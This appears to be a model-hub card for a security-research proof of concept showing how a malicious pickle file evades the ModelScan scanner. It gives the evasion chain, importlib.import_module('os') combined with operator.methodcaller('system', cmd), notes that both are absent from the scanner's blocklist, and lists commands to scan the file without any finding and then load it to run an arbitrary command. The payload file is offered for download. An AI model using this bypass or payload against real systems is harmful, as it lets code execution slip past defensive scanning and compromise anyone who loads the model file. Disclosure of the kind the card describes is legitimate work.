Pickle Scanner Bypass PoC

Security research โ€” ModelScan pickle scanner evasion via incomplete blocklist.

File

  • bypass_rce.pkl (111 bytes) โ€” Full RCE payload that evades ModelScan detection

Bypass Chain

importlib.import_module("os")  +  operator.methodcaller("system", cmd)  =  RCE

Both importlib and operator.methodcaller are absent from ModelScan's blocklist.

Reproduce

# Scan โ€” reports zero issues (false negative)
modelscan -p bypass_rce.pkl

# Load โ€” executes arbitrary command
python3 -c "import pickle; pickle.load(open('bypass_rce.pkl', 'rb'))"
# Output: PWNED_VIA_MODELSCAN_BYPASS
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support